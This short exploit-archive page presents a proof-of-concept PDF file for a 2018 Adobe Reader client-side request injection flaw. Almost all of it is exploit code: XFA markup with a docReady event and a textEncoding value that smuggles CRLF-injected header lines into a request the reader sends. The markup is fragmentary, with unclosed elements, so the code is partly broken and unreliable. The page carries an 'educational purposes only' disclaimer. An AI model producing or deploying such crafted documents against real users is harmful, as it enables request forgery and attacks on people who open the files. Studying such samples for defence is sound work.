Adobe reader pdf client side request injection Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2018-05-02 | Type : local | Platform : windows
This exploit / vulnerability Adobe reader pdf client side request injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% modified by InsertScript

%PDF-1. % can be truncated to %PDF-\0

1 0 obj <<>>
<xdp:xdp xmlns:xdp="">

<subform name="_">
<field id="Hello World!">
<event activity="docReady" ref="$host" name="event__click">
textEncoding="UTF-16&#xD;&#xA;test: test&#xD;&#xA;"
xdpContent="pdf datasets xfdf"

trailer <<
/Root <<
/AcroForm <<
/Fields [<<
/T (0)
/Kids [<<
/Subtype /Widget
/Rect []
/T ()
/FT /Btn
/XFA 1 0 R
/Pages <<>>